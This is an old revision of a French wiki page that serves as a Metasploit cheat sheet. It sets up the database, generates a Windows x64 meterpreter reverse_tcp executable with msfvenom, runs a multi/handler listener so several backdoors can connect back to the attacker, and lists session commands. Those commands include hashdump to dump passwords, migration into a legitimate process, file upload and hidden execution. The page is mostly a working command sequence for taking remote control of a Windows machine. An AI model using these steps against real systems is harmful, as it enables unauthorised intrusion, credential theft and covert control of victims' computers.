metasploit:accueil

Ceci est une ancienne révision du document !


Metasploit

msfdb init
service postgresql start
msfconsole
msf > db_rebuild_cache

Cela lance la reconstruction du cache en arrière-plan. Pour savoir quand cette construction est terminée, il suffit de lancer une recherche:

msf > search uac

Et interpréter le résultat !

Ensuite, lorsque la machine est redémarrée, pour profiter de la mise en cache, il faut lancer le service postgresql.

Lancer Metasploit

msfconsole

Lance une console de Metasploit.

Rechercher dans la base de Metasploit

msf > search <terme>

Avoir des infos sur un module

msf > info <module>

Sélectionner un module pour l'utiliser

msf > use <module>

On entre alors dans une sous-console propre au module, qui nous permet d'effectuer des opérations sur le module:

  • show options: affiche les options du module
  • set <option name> <option value>: défini les options
  • exploit: exécute le module

Meterpreter est une boîte à outils que l'on peut envoyer sur Windows pour ensuite prendre la main du poste. Lors de l'exécution du payload, celui-ci va contacter le poste de l'attaquant, qui aura alors la main sur le poste attaqué.

Générer le payload

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o ./<payload>.exe

LHOST:LPORT est l'adresse de l'attaquant

Lancer le service dans Metasploit pour la prise à distance

C'est ce service que contactera le payload:

msf > use exploit/multi/handler
msf > handler > set payload windows/x64/meterpreter/reverse_tcp
msf > handler > show options
msf > handler > # compléter les options nécessaires: IP: ip de la machine du pirate, PORT: port sur lequel le service va écouter
msf > handler > set ExitOnSession false # Quand une backdoor nous a joint, continuer à écouter pour pouvoir répondre à d'autres backdoors.
msf > handler > exploit -j -z

Manipulations des sessions

msf > handler > sessions -l # liste les sessions
msf > handler > sessions -i <id de la session> # entrer dans une session pour interagir avec meterpreter

Au sein d'une session Meterpreter

meterpreter > background # revient à la console metasploit
meterpreter > help 
meterpreter > sysinfo # donne des infos sur le système
meterpreter > getprivs # voir les privilèges dont on dispose
meterpreter > shell # lance une invite de commande Windows
meterpreter > hashdump # dump la base de mots de passe, nécessite d'être administrateur authentifié
meterpreter > migrate # permet de migrer vers un processus existant légitime
meterpreter > net users # liste les utilisateurs
meterpreter > net user <username> # donne des infos sur l'utilisateur
meterpreter > net localgroup Administrators # liste les utilisateurs locaux du groupe Administrators
meterpreter > upload <localfile> # charge un fichier local vers la cible du meterpreter
meterpreter > execute -H
  • metasploit/accueil.1616186598.txt.gz
  • Dernière modification : 2021/04/04 17:01
  • (modification externe)